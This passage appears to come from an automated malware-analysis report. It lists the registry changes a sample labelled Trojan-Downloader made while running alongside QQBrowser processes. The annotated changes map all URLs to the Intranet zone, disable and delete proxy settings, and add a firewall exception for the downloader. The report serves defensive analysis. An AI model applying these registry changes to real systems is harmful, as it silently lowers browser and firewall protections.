"BitNames" = " SECHC_LOG_FLAG_ASSERT SECHC_LOG_FLAG_INIT SECHC_LOG_FLAG_DIAG SECHC_LOG_FLAG_ONEX_DIAG SECHC_LOG_FLAG_REPAIR SECHC_LOG_FLAG_STATE SECHC_LOG_FLAG_EXT SECHC_LOG_FLAG_EVENT_LOG SECHC_LOG_FLAG_FUNCTION SECHC_LOG_FLAG_MEMORY SECHC_LOG_FLAG_LOCKS"
[HKCR\TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32]
"(Default)" = "%System%\oleacc.dll"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\Tencent\QQBrowser\FavSync]
"clientguid" = "b0a3ce30538e195b075c1c7e144988cb"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"
[HKCU\Software\Chromium]
"_NumSignedIn" = "0"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C4 B4 B4 C3 B2 24 F9 6F 85 5C D8 EA 2D 68 82 5C"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\QQBrowser\DEBUG]
"Trace Level" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Chromium]
"_NumAccounts" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\CtlGuid]
"Guid" = "d905ac1c-65e7-4242-99ea-fe66a8355df8"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\WDiagCoreCtlGuid]
"BitNames" = " WD_LOG_FLAG_INIT WD_LOG_FLAG_RPC WD_LOG_FLAG_EVENT WD_LOG_FLAG_INTERFACE WD_LOG_FLAG_CONNECTION WD_LOG_FLAG_CONTROL WD_LOG_FLAG_LOCKS WD_LOG_FLAG_MEMORY WD_LOG_FLAG_REFERENCES WD_LOG_FLAG_FUNCTION_TRACE WD_LOG_FLAG_ASSERT"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKCU\Software\Chromium]
"usagestats" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\WLanDiagCtlGuid]
"Guid" = "6da4ddca-0901-4bae-9ad4-7e6030bab531"
[HKCU\Software\Tencent\QQBrowser\OnlineSetup]
"sso-f1" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\WDiagCoreCtlGuid]
"Guid" = "637a0f36-dff5-4b2f-83dd-b106c1c725e2"
The Trojan-Downloader modifies the IE security zone settings to map all local web nodes whose names contain no dots, and which are not mapped to any zone, to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan-Downloader modifies the IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan-Downloader modifies the IE security zone settings to map all URLs to the Intranet Zone:
"IntranetName" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan-Downloader deletes the following value(s) in the system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\QQBrowser\DEBUG]
"Trace Level"
The process QQBrowser.exe:2364 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B9 43 09 D2 35 1E E2 93 CB 97 94 C6 C6 F5 82 5D"
The process QQBrowser.exe:3600 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "14 08 9B 01 4E 2E 83 1B 0D 16 52 3F 20 66 22 B3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCU\Software\Tencent\QQBrowser\Scopes\2328_573875]
"CrashRecord" = "9B 85 4A 96 02 00 00 00 00 00 00 00 00 00 00 00"
The process QQBrowser.exe:2624 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in the system registry:
[HKCU\Software\Tencent\QQBrowser\Advanced]
"DirectWriteFontRenderEnabled" = "0"
[HKCU\Software\Tencent\QQBrowser\Scopes\2328_573875]
"CrashRecord" = "9B 85 4A 96 01 00 00 00 00 00 00 00 00 00 00 00"
[HKCU\Software\Tencent\QQBrowser\Advanced]
"JoinUserExperienceImprovePlan" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Liveup\Temp]
"QQBrowserLiveup.exe" = "QQBrowserLiveup"
[HKCU\Software\Tencent\QQBrowser\InstallInfo]
"NeedImportOtherBrowserExtension" = "1"
"HelloQB" = "9"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCU\Software\Tencent\QQBrowser\Common]
"UninstalledExtensions" = "7B 7D"
[HKCU\Software\Tencent\QQBrowser\InstallInfo]
"FirstLaunch" = "0"
[HKCU\Software\Tencent\QQBrowser\Common]
"SearchEngineKeyword" = "sogou.com"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Tencent\QQBrowser\Record]
"FProcId" = "2624"
[HKCU\Software\Tencent\QQBrowser\Layout]
"PluginBarInfo" = "7B 22 70 6C 75 67 69 6E 5F 69 6E 66 6F 5F 76 65"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Tencent\QQBrowser\Liveup]
"CheckResult" = "160"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Tencent\QQBrowser\Liveup]
"LastQueryDate" = "13108115704780"
[HKCU\Software\Tencent\QQBrowser\InstallInfo]
"NeedImportDefBrowserBookmark" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Tencent\QQBrowser\InstallInfo]
"NeedImportConfigBookmark" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Tencent\QQBrowser\Common]
"SearchEngine" = ""
[HKCU\Software\Tencent\QQBrowser\Advanced]
"AeroEffectSupported" = "0"
[HKCU\Software\Tencent\QQBrowser\Record]
"BProcId" = "1252"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "30 D1 7C DE 1A 5F 20 BF 45 BD 32 93 99 F6 C9 96"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Tencent\QQBrowser\Advanced]
"AeroEffectEnabled" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Tencent\QQBrowser\InstallInfo]
"NewInstall" = "0"
"FirstLaunchTime" = "223213787"
[HKCU\Software\Tencent\QQBrowser\Launch]
"AutoRestoreTabs" = "0"
The Trojan-Downloader modifies the IE security zone settings to map all local web nodes whose names contain no dots, and which are not mapped to any zone, to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan-Downloader modifies the IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan-Downloader modifies the IE security zone settings to map all URLs to the Intranet Zone:
"IntranetName" = "1"
The Trojan-Downloader deletes the following value(s) in the system registry:
[HKCU\Software\Tencent\QQBrowser\Common]
"MainPageDIY9"
[HKCU\Software\Tencent\QQBrowser\Record]
"FProcId"
"IsExiting"
[HKCU\Software\Tencent\QQBrowser\InstallInfo]
"QB9Overwrite8"
[HKCU\Software\Tencent\QQBrowser\Launch]
"EducationUrl"
[HKCU\Software\Tencent\QQBrowser\Record]
"BProcId"
The process QQBrowser.exe:2852 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7A 35 1C D3 7D 33 EA F5 89 7C 8D 34 2E 42 34 6C"
The process QQBrowser.exe:2764 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3E 37 AD AF B8 8A AD F7 02 79 89 F2 36 32 C1 3F"
The process QQBrowser.exe:3404 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "65 C7 9F 42 81 25 7B 67 0E 60 C0 A0 2C 5A 63 78"
The process QQBrowser.exe:2836 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in the system registry:
[HKCU\Software\Tencent\QQBrowser\Scopes\2328_573875]
"CrashRecord" = "9B 85 4A 96 02 00 00 00 00 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 25 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "49 61 0F 9F A6 FE BC 0A D4 72 1F AF 44 24 ED D5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan-Downloader modifies the IE security zone settings to map all local web nodes whose names contain no dots, and which are not mapped to any zone, to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan-Downloader modifies the IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan-Downloader modifies the IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan-Downloader deletes the following value(s) in the system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process QQBrowser.exe:2488 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FD A7 6C 4F F6 B2 5A 7C 37 C0 42 73 E4 CF DB 4C"
[HKCU\Software\Tencent\QQBrowser\Scopes\2328_573875]
"CrashRecord" = "9B 85 4A 96 02 00 00 00 00 00 00 00 00 00 00 00"
The process QQBrowser.exe:4064 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in the system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Tencent\QQBrowser\Scopes\2328_573875]
"CrashRecord" = "9B 85 4A 96 01 00 00 00 00 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.200]
"Desc" = "QBSafe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.200]
"AutoUpdated" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.200]
"Operational" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.200]
"ManifestVersion" = "2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.200]
"STYLE" = "80"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.200]
"Name" = "QBSafe"
[HKCU\Software\Tencent\QQBrowser\Record]
"IsColdStartup" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.200]
"RequiredMinVersion" = "9.0.1.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.200\BackgroundDll]
"Path" = "QBSafe.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "98 96 10 8F CB 7D 47 A5 C3 0F 7F D4 88 E2 BB E7"
[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.200]
"Version" = "9.0.0.200"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}]
"UpdateVersion" = "9.0.0.200"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.200\BackgroundDll]
"LoadingTime" = "LoadAsInited"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.200]
"ID" = "{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Tencent\QQBrowser\Record]
"LastStartupTime" = "1463642081"
The Trojan-Downloader modifies the IE security zone settings to map all local web nodes whose names contain no dots, and which are not mapped to any zone, to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan-Downloader modifies the IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan-Downloader modifies the IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan-Downloader deletes the following value(s) in the system registry:
[HKCU\Software\Tencent\QQBrowser\Record]
"SendFailedCount"
"SendCount"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"ProxyServer"
"AutoConfigURL"
[HKCU\Software\Tencent\QQBrowser\Advanced]
"DrvInstalled"
The process QQBrowser.exe:2492 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0E EF 9E DA 9F 07 8F 01 1F 6D 5E 72 C2 58 1E AD"
The process QQBrowser.exe:3504 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3F E3 F4 A3 4A 69 63 83 06 63 2E 0B 85 1B FC 77"
[HKCU\Software\Tencent\QQBrowser\Scopes\2328_573875]
"CrashRecord" = "9B 85 4A 96 02 00 00 00 00 00 00 00 00 00 00 00"
The process QQBrowser.exe:3032 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A1 DA 13 D5 D2 97 09 B3 08 D2 5D 64 6F BE 6F CF"
The process QQPCDownload8889533.exe:1584 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8A 26 2E 36 38 82 D9 EE 74 23 49 B7 BE 9F EE A9"
Adds a rule to the Windows firewall that allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Local Settings\Temp]
"QQPCDownload8889533.exe" = "%Documents and Settings%\%current user%\Local Settings\Temp\QQPCDownload8889533.exe:*:Enabled:Tencent Download Program"
The process j3lx7ew39.exe:2960 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in the system registry:
[HKCR\QQBrowser.Protocol]
"(Default)" = "QQBrowser HTML Document"
[HKCU\Software\Tencent\QQBrowser\Launch]
"SkinUpdateFlag" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps\QQBrowser.exe]
"DumpType" = "2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Start_NotifyNewApps" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\Tencent\QQBrowser]
"INSTLANG" = "1033"
[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.8]
"Version" = "9.0.0.8"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\9.0.0.8]
"Desc" = "QBSafe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Tencent\QQBrowser\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}]
"CommandOrder" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Tencent\QQBrowser\Advanced]
"CountEndTimeLow" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps\QQBrowser.exe]
"DumpFolder" = "\\tencent.com\tfs\跨部门项目\pcbrowser_dumps\dumps\WerDumps"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCU\Software\Tencent\QQBrowser\Advanced]
"DefaultBrowser" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\QQBrowser]
"URLInfoAbout" = "http://www.qq.com"
[HKCR\QQBrowser.Protocol\DefaultIcon]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe,0"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\12au8967c\QBInstaller.dll,"
[HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Persisted\%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download]
"j3lx7ew39.exe" = "1"
[HKCU\Software\Tencent\QQBrowser\Advanced]
"JoinUserExperienceImprovePlan" = "1"
